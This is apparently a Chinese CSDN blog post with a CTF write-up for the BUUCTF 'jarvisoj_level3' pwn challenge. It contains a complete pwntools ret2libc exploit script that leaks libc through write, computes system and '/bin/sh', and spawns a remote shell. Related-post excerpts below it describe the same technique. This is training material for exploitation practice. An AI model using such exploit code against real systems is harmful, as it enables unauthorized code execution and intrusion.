jarvisoj_level3

已于 2023-05-24 21:28:13 修改
阅读量151 收藏
点赞数 1
分类专栏: BUUCTF 文章标签: 安全
于 2023-05-24 21:27:54 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74020775/article/details/130855867
版权

小白垃圾笔记,不建议阅读。

看下保护。

 绕过NX        

泄露libc吧。

最近才知道buu有所有的libc:

 BUUCTF在线评测

拷贝到本地,感觉方便多了。

思路是通过write泄露write的地址,然后计算偏移。

exp:

from pwn import *
from LibcSearcher import *
debug=0
if debug:
    p=process('./level3')
    elf=ELF('./level3')
    #libc=ELF('/lib/i386-linux-gnu/libc.so.6')
    #p=process('',env={'LD_PRELOAD':'./libc.so'})
    context.log_level='debug'
    gdb.attach(p)
    libc=ELF('/lib/i386-linux-gnu/libc.so.6')
else:
    p=remote('node4.buuoj.cn',27819)
    elf=ELF('./level3')
    libc=ELF('/home/y/Desktop/pwn/libc/ubuntu1632/libc-2.23 (3).so')
    context.log_level='debug'
def ru(x):
    return p.recvuntil(x)
 
def se(x):
    p.send(x)
 
def sl(x):
    p.sendline(x)
    
pop_rdi_addr=  0x0000000000400733   # : pop rdi ; ret
ret_addr= 0x00000000004004d1         # : ret
pop_rsi_r15_addr=0x0000000000400731 #: pop rsi ; pop r15 ; ret

write_plt_addr=elf.plt['write']
write_got_addr=elf.got['write']
main_addr=elf.sym['main']  
#read_addr=elf.got['read']
#main_addr=0x0000000000400636
format_str=0x0000000000400770
 
ru(b'Input:\n')

payload = b'a'*(0x88+4)+p32(write_plt_addr)+p32(main_addr)+p32(1)+p32(write_got_addr)+p32(4)

se(payload+b'\n')

write_addr=u32(p.recvuntil(b'\xf7')[-4:])

#printf_addr=u32(p.recv(4))
print(hex(write_addr))

#libc=LibcSearcher('printf',printf_addr)
#libc_base_addr=printf_addr-libc.dump('printf')
#system_addr=libc_base_addr+libc.dump('system')
#bin_sh_addr=libc_base_addr+libc.dump('str_bin_sh')
 
 
 
libc_base_addr=write_addr-libc.sym['write']
system_addr=libc_base_addr+ libc.sym['system']	
bin_sh_addr=libc_base_addr+ next(libc.search(b'/bin/sh\x00'))
 

payload2=b'a'*(0x88+4)+p32(system_addr)+b'aaaa'+p32(bin_sh_addr)
 
 
ru(b'Input:\n')

se(payload2+b'\n')
#se(payload2.ljust(0x60,b'b')+b'\n')
#ru(b'\n')
p.interactive()



 
#ROPgadget --binary <binary_file> --only "pop|ret" | grep "pop rdi"
#ROPgadget --binary bin --only "pop|ret"
#ROPgadget --binary ./level2_x64 --only "ret"

#ROPgadget --binary babyrop2 |grep "pop rsi"

#write_add=u32(p.recv(4))

#addr=u32(r.recvuntil(b'\xf7')[-4:])
#puts_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
#sa(b'wish!\n', b'%11$p')
#rl(b'0x')
#canary = int(p.recv(16), 16)

y6y6y666
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
3D_LevelSet 2_levelset_forwardweh_3Dlevelset_
10-02
《3D LevelSet方法在3D医学图像分割中的简单实现》 在计算机视觉与医学成像领域,3D LevelSet方法是一种广泛应用于图像分割的重要技术。该方法通过数学上的水平集理论,对复杂的三维图像进行精确分割,尤其适用于...
jarvis oj level3
weixin_44932880的博客
07-25 271
所需知识 先在终端用file命令查看文件为32位,在对应版本的IDA中打开 用checksec命令查看文件发现 栈无保护,再看伪代码分析可知 可以在传入buf 时覆盖栈的函数返回地址,即可以返回system函数的地址 再给system传入参数"/bin/sh" 就可以进入服务器的终端得到flag 大致思路跟第二题是一样的, 但是不同点在于上一题可以直接在IDA里面获得函数syste...
BUUCTF pwn——jarvisoj_level3
CNS-Enterprise BCC-1701-J
04-21 157
BUUCTF 做题练习
jarvisoj level3
sun的博客
10-03 1008
level3 将文件下载下来使用linux下的checksec进行检查开启了什么安全机制 sun@ubuntu:~/Desktop/test$ checksec level3 [*] '/home/sun/Desktop/test/level3' Arch: i386-32-little RELRO: Partial RELRO Stack: No c...
BUUCTF(pwn)jarvisoj_level3
半岛铁盒的博客
04-02 279
EXP from pwn import* from LibcSearcher import* r=remote('node3.buuoj.cn',25564) main=0x8048484 elf=ELF('./2') write_plt=elf.plt['write'] write_got=elf.got['write'] payload='a'*(0x88+4)+p32(write_plt)+p32(main)+p32(1)+p32(write_got)+p32(4) r.sendl..
Level_Set.zip_level set_level-set_set
07-15
3. **Euler方程求解**:Level Set方程是一个偏微分方程,通常用Euler方法进行数值求解。这涉及到在每个时间步长内更新水平集函数,使其按照速度函数的引导移动。 4. **重初始化**:为了防止水平集函数在演化过程中...
level_set_image.rar_level set_level set 方程
09-21
3. 求解Level Set方程:使用有限差分或者数值积分的方法,更新φ函数的值,模拟其随时间的演化。 4. 重构边界:由于Level Set方法可能导致φ函数的宽度变宽,需要通过重初始化或重新嵌入来保持其厚度恒定。 5. 分割...
Low_Level_IO
02-11
2020年计算机体系结构和汇编语言组合项目阅读Proj6_Morrowj2.asm以获得代码该程序获取10个带符号的32位整数,进行验证并将其从ASCII转换为SDWORD,然后在转换回ASCII以及求和和舍入平均后,显示SDWORDS数组。
five_level_inverter.rar_CMLI_5level_harmonics inverter
07-15
3. “switching_angles_5_level_hardware.asv”:可能涉及到逆变器硬件实现的开关角度控制策略。 4. “newton_raphson_imp_prog_5_NPSC.asv”、“N_R_5_Level.asv”、“new_raphson_5_level.asv”:这些文件可能使用...
Jarvis OJ--level3
Kni9hT's Blog
11-10 239
要点:通过read()的溢出构造rop链,获得write()函数的真实地址,再利用libc的偏移算出system和“/bin/sh”的地址,再次利用write()溢出,执行system,就能得到shell。 添加链接描述 flag: CTF{d85346df5770f56f69025bc3f5f1d3d0} ...
jarvis oj level3
CNXBDSa的博客
07-27 384
首先先了解一下libc库的知识详情请移步大佬总结 了解一下plt和got表详情请移步大佬总结 然后是做题过程首先老规矩在ubuntu中checksec+文件名查看有无什么保护机制和位数 Arch:说明这个文件的属性是什么,说明是32位的程序。 Stack:canary,这个主要是说栈保护的东西,所利用的东西就是相当于网站的cookie,linux中把这种cookie信息称为cana...
BUUCTF jarvisoj_level3
红叶的博客
10-27 324
切入点从泄露write函数入手。栈溢出漏洞,ret2libc。IDA Pro 静态调试。
[BUU-WP]jarvisoj_level3
m0sway的博客
11-22 758
jarvisoj_level3 使用checksec查看: 只开启了栈不可执行,估计又是一道栈溢出的题目,直接放进IDA中看吧: 主函数中直接给了漏洞函数,跟进去查看: read()函数可以向buf变量中写入0x100而buf距离ebp只有0x88,存在栈溢出 但这道题没有system和/bin/sh,一道标准的ret2libc 用write函数泄露libc地址,找system和/bin/sh exp: from pwn import * #start r = remote("node4.buuo
Jarvis OJ level3 writeup
PLpa的博客
07-07 272
这题是典型的ROP返回libc地址题,是一个十分经典的ROP题目。 拿到题目我们可以看到他给出了一个rar文件,我们拿这个文件到Linux中解压一下: 解压出两个文件:level3和libc-2.19.so。 我们查看一下这两个文件的保护: 可以看到,libc-2.19.so保护全部开启了(幸好不是攻击他,哈哈),而level3只开了NX保护。 我们把level3放到IDA中查看一下程序逻辑:...
BUU-pwn(四)
qq_53263789的博客
09-04 163
BUU-pwn(四)
(Jarvis Oj)(Pwn) level3
Nothing
04-24 1650
(Jarvis Oj)(Pwn) level3 首先用checksec查看一下保护。 依然开启了NX保护。ida反汇编,找到溢出点。 可是呢,这次在程序中并没有找到system函数,和”/bin/sh”字符串,那么这次该如何拿到shell呢,还是利用system函数,但是没有程序中system的plt,我们如何获取system的地址呢,这需要利用到在libc.so文件中各个函数的相对...
BUUCTF----jarvisoj_level3_x64
qq_33010875的博客
09-26 447
环境:WSL2,ubuntu16.04,python2 checksec文件: 这道题level3的思路一样,只是32位的程序改成了64位。 也就是说,在利用write函数泄露出libc的基地址时,需要用到寄存器来穿参数,write有三个参数,所以需要rdi,rsi,rdx三个寄存器,通过命令: ROPgadget --binary level3_x64 |grep "pop" 结果: 从图中可以看到只找到了rdi和rsi寄存器,没有rdx寄存器 尝试gdb程序: 在read函数下断点,可以看到rd
【BUUCTF】jarvisoj_level3
m0_51251108的博客
12-28 342
【BUUCTF】jarvisoj_level3 标准的ret2libc 这里记一下找偏移的方法: readelf -a libc库文件|grep “puts” 或者用symbol这些 strings 文件 -tx|grep “/bin/sh” 抓出/bin/sh 可以找/bin/sh在libc中的地址 这里直接给出exp: from pwn import* r=remote('node3.buuoj.cn',28705) libc=ELF('./libc-2.23.so') elf=ELF('./
jarvisoj_level0
最新发布
08-14
引用是一段关于利用pwntools库对jarvisoj_level0进行攻击的代码。代码中使用了remote()方法建立了远程连接,并构造了一个payload来利用栈溢出漏洞,最终执行callsystem()函数来获取shell权限。引用也是类似的代码,只是连接的地址不同。引用是一篇关于pwntools基本用法的文章,并提供了一些常用的函数和方法。根据这些引用内容,可以得出结论,jarvisoj_level0是一个存在栈溢出漏洞的程序,可以通过构造特定的payload来执行系统调用函数,从而获取shell权限。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [jarvisoj_level0](https://blog.csdn.net/weixin_56301399/article/details/125919313)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [jarvisOJ-level0](https://blog.csdn.net/qq_35661990/article/details/82889103)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [jarvis oj---level0解题方法](https://blog.csdn.net/weixin_45427676/article/details/97272924)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

y6y6y666

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值